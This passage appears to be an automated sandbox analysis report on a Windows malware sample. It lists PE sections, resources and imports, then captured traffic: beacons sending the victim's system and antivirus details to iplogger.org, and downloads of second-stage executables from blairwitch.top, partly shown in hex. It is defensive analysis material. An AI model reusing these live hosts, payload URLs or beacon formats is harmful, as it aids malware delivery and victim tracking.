.rsrc	0x1843000	0x6e85	0x7000	False	0.528599330357	data	5.58081509339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x184a000	0x1143c	0x11600	False	0.074260903777	data	0.972663610486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x1843534	0x2	data	Divehi; Dhivehi; Maldivian	Maldives
YONAMIKORUFENI	0x1843538	0xee8	ASCII text, with very long lines, with no line terminators	Spanish	Panama
RT_CURSOR	0x1844420	0x130	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x1844550	0xf0	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x1844640	0x10a8	dBase III DBT, version number 0, next free block index 40	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0x18456e8	0x8a8	data	Spanish	Panama
RT_ICON	0x1845f90	0x6c8	data	Spanish	Panama
RT_ICON	0x1846658	0x568	GLS_BINARY_LSB_FIRST	Spanish	Panama
RT_ICON	0x1846bc0	0x10a8	data	Spanish	Panama
RT_ICON	0x1847c68	0x988	data	Spanish	Panama
RT_ICON	0x18485f0	0x468	GLS_BINARY_LSB_FIRST	Spanish	Panama
RT_STRING	0x1848a58	0xfc	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1848b54	0x252	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1848da8	0x458	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1849200	0x25c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x184945c	0x24a	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x18496a8	0x78	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x1849720	0x30	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x1849750	0x5a	data	Spanish	Panama
RT_VERSION	0x18497ac	0x12c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_MANIFEST	0x18498d8	0x5ad	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

Imports

DLL	Import
KERNEL32.dll	UnregisterWait, SetCriticalSectionSpinCount, HeapCompact, lstrcmpA, FindFirstFileW, FindFirstChangeNotificationW, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetFirmwareEnvironmentVariableA, CreateJobObjectW, GlobalLock, AddConsoleAliasW, SetVolumeMountPointW, GetComputerNameW, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, CreateNamedPipeW, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, SetCommState, GetSystemWow64DirectoryA, CreateActCtxW, WaitForMultipleObjectsEx, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, FatalAppExitW, GetThreadSelectorEntry, GetCalendarInfoW, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, GetSystemWindowsDirectoryA, ReadConsoleOutputW, SetConsoleCP, DeleteVolumeMountPointW, InterlockedPopEntrySList, GetFileAttributesA, lstrcpynW, SetConsoleMode, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, TerminateProcess, GetAtomNameW, IsDBCSLeadByte, GetModuleFileNameW, lstrcatA, QueryInformationJobObject, GetBinaryTypeW, GetVolumePathNameA, lstrlenW, GetPrivateProfileSectionNamesW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, VerifyVersionInfoW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, FreeLibraryAndExitThread, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, GetLongPathNameA, HeapSize, CreateJobSet, LocalLock, LockFileEx, EnterCriticalSection, VerLanguageNameW, SearchPathA, BuildCommDCBW, FindClose, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, LocalAlloc, MoveFileA, BuildCommDCBAndTimeoutsW, GetExitCodeThread, GetNumberFormatW, SetCurrentDirectoryW, SetFileApisToANSI, QueryDosDeviceW, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, SetNamedPipeHandleState, SetEnvironmentVariableA, GetVolumePathNamesForVolumeNameA, GetDefaultCommConfigA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, FindNextFileW, WriteProfileStringW, VirtualProtect, EnumDateFormatsW, CompareStringA, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CopyFileExA, LocalFileTimeToFileTime, CreateFileW, SetStdHandle, GetFullPathNameA, GetThreadContext, WritePrivateProfileStringW, ExitProcess, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, HeapValidate, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, LeaveCriticalSection, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits
ADVAPI32.dll	GetFileSecurityW
MSIMG32.dll	AlphaBlend

Version Infos

Description	Data
Translations	0x0022 0x023c

Possible Origin

Language of compilation system	Country where language is spoken	Map
Divehi; Dhivehi; Maldivian	Maldives
Spanish	Panama

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 18:23:38.144129992 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.144193888 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.144314051 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.153644085 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.153677940 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.246524096 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.246654034 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.249973059 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.249998093 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.250401020 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.360435963 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.518167019 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.549195051 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.549273014 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.549377918 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.555331945 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.555365086 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.555403948 CET	49766	443	192.168.2.6	5.9.162.45
Nov 25, 2021 18:23:38.555413008 CET	443	49766	5.9.162.45	192.168.2.6
Nov 25, 2021 18:23:38.746623039 CET	49767	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:38.767193079 CET	80	49767	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:38.767386913 CET	49767	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:38.768347979 CET	49767	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:38.829876900 CET	80	49767	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:39.900194883 CET	80	49767	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:39.900265932 CET	80	49767	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:39.900378942 CET	49767	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:39.900425911 CET	49767	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:39.900590897 CET	49767	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:39.921459913 CET	80	49767	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.628614902 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.650346041 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.651211023 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.652014017 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.713612080 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777359009 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777395964 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777426958 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777447939 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777466059 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.777470112 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777494907 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777508974 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.777523994 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777559042 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777571917 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.777584076 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777605057 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.777607918 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.777626991 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.777662039 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.798100948 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.798212051 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823663950 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823700905 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823728085 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823740005 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823750019 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823776007 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823798895 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823800087 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823822975 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823832989 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823852062 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823857069 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823873043 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823890924 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823895931 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823920965 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823923111 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823944092 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823961973 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.823966980 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823990107 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.823995113 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.824012041 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.824033022 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.824034929 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.824055910 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.824062109 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.824085951 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.824095011 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.824110985 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.824135065 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.824135065 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.824167967 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.824199915 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.844460964 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.844494104 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.844564915 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.844590902 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.871007919 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.871021986 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.871057034 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.871081114 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.871105909 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.871133089 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.871146917 CET	80	49768	8.209.114.247	192.168.2.6
Nov 25, 2021 18:23:43.871150970 CET	49768	80	192.168.2.6	8.209.114.247
Nov 25, 2021 18:23:43.871169090 CET	80	49768	8.209.114.247	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 18:23:38.110043049 CET	61346	53	192.168.2.6	8.8.8.8
Nov 25, 2021 18:23:38.125971079 CET	53	61346	8.8.8.8	192.168.2.6
Nov 25, 2021 18:23:38.706470013 CET	51774	53	192.168.2.6	8.8.8.8
Nov 25, 2021 18:23:38.744299889 CET	53	51774	8.8.8.8	192.168.2.6
Nov 25, 2021 18:23:49.622467041 CET	56023	53	192.168.2.6	8.8.8.8
Nov 25, 2021 18:23:49.643354893 CET	53	56023	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 18:23:38.110043049 CET	192.168.2.6	8.8.8.8	0x3fc6	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:38.706470013 CET	192.168.2.6	8.8.8.8	0xc752	Standard query (0)	blairwitch.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:49.622467041 CET	192.168.2.6	8.8.8.8	0xbd5c	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 25, 2021 18:23:38.125971079 CET	8.8.8.8	192.168.2.6	0x3fc6	No error (0)	iplogger.org	5.9.162.45	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:38.744299889 CET	8.8.8.8	192.168.2.6	0xc752	No error (0)	blairwitch.top	8.209.114.247	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:49.643354893 CET	8.8.8.8	192.168.2.6	0xbd5c	No error (0)	iplogger.org	5.9.162.45	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

iplogger.org

blairwitch.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49766	5.9.162.45	443	C:\Users\user\Desktop\VYeSXonMT1.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49769	5.9.162.45	443	C:\Users\user\Desktop\VYeSXonMT1.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49767	8.209.114.247	80	C:\Users\user\Desktop\VYeSXonMT1.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 18:23:38.768347979 CET	1190	OUT	GET /jollion/apines.exe HTTP/1.1 User-Agent: AutoHotkey Host: blairwitch.top Cache-Control: no-cache
Nov 25, 2021 18:23:39.900194883 CET	1191	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2021 17:23:39 GMT Server: Apache/2.4.38 (Debian) Content-Length: 276 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 6c 61 69 72 77 69 74 63 68 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at blairwitch.top Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49768	8.209.114.247	80	C:\Users\user\Desktop\VYeSXonMT1.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 18:23:43.652014017 CET	1191	OUT	GET /work/mix.exe HTTP/1.1 User-Agent: AutoHotkey Host: blairwitch.top Cache-Control: no-cache
Nov 25, 2021 18:23:43.777359009 CET	1193	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 17:23:43 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Wed, 24 Nov 2021 20:15:01 GMT ETag: "47600-5d18e834737b3" Accept-Ranges: bytes Content-Length: 292352 Connection: close Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 03 34 fe 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 6a 03 00 00 66 01 00 00 00 00 00 9b 2c 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 04 00 00 04 00 00 a3 a7 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 ef 03 00 78 00 00 00 00 70 04 00 78 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 81 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 9c 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 69 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 78 00 00 00 80 03 00 00 7a 00 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 62 00 00 00 00 04 00 00 18 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 75 00 00 00 70 04 00 00 76 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 44 24 04 c2 04 00 81 00 40 36 ef c6 c3 55 8b ec 81 ec 24 04 00 00 8b 45 08 53 8b 18 8b 40 04 56 57 33 ff 81 3d 4c 3d 44 00 ee Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL4^jf,@Txpxu@\|.textij `.rdata&xzn@@.datab@.rsrcxupv@@3D$@6U$ES@VW3=L=D

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49766	5.9.162.45	443	C:\Users\user\Desktop\VYeSXonMT1.exe

Timestamp	Direction	Data
2021-11-25 17:23:38 UTC	OUT	GET /1mjvg7 HTTP/1.1 Cache-Control: no-cache, no-store Connection: Keep-Alive Pragma: no-cache Accept: / If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT User-Agent: ( Windows 10 Enterprise \| x64 \| Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz \| Windows Defender \| Chrome ) Host: iplogger.org
2021-11-25 17:23:38 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Nov 2021 17:23:38 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: clhf03028ja=84.17.52.63; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=241187173; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 25 Nov 2021 17:23:38 +0000 Answers: whoami: 3146fe08c30f17ae2e16798dc589f58b4ccb87beffe78df9f7027e7c3deb639d Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY
2021-11-25 17:23:38 UTC	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49769	5.9.162.45	443	C:\Users\user\Desktop\VYeSXonMT1.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 17:23:49 UTC	0	OUT	GET /1mhvg7 HTTP/1.1 Cache-Control: no-cache, no-store Connection: Keep-Alive Pragma: no-cache Accept: / If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT User-Agent: ( Windows 10 Enterprise \| x64 \| Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz \| Windows Defender \| Chrome ) Host: iplogger.org
2021-11-25 17:23:49 UTC	1	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Nov 2021 17:23:49 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: clhf03028ja=84.17.52.63; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=241187162; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 25 Nov 2021 17:23:49 +0000 Answers: whoami: 3146fe08c30f17ae2e16798dc589f58b4ccb87beffe78df9f7027e7c3deb639d Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY
